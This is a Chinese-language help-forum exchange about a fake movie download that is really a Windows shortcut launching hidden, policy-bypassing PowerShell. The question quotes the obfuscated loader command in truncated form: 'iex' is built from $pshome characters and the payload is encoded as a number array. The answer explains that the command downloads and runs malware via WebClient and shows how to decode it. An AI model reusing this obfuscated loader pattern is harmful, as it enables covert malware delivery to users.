在 Windows 10 中,我下载了这个文件,我以为它是一部电影,但它是一个 700MB 大小的快捷方式
我看到目标是这个
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ($pshOmE[4]+$PShoMe[30]+'X')(-JoiN((44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116
开始时间定于
%SYSTEMROOT%\System32\WindowsPowerShell\v1.0
它有什么作用?
答案1
它是一个恶意软件加载程序。
New-Object System.N...
它执行以(隐藏在数字中)开头的 powershell 代码,完整内容为New-Object System.Net.WebClient
,该代码将进一步用于从同样隐藏在混淆代码的进一步数字中的 URL 下载并执行实际的恶意软件。
如果您已经点击了该链接,那么您可能已经被感染,除非该 URL 已被删除。
您可以尝试将行粘贴到记事本中,然后删除 之前的所有内容( -JoiN( (
,复制剩余部分(以( -JoiN( (
... 开头)并将其粘贴到 PowerShell 窗口。它将揭示通常由前面的$pshOmE[4]+$PShoMe[30]+'X')
= iex
=执行的混淆的 PowerShell 代码Invoke-Expression
。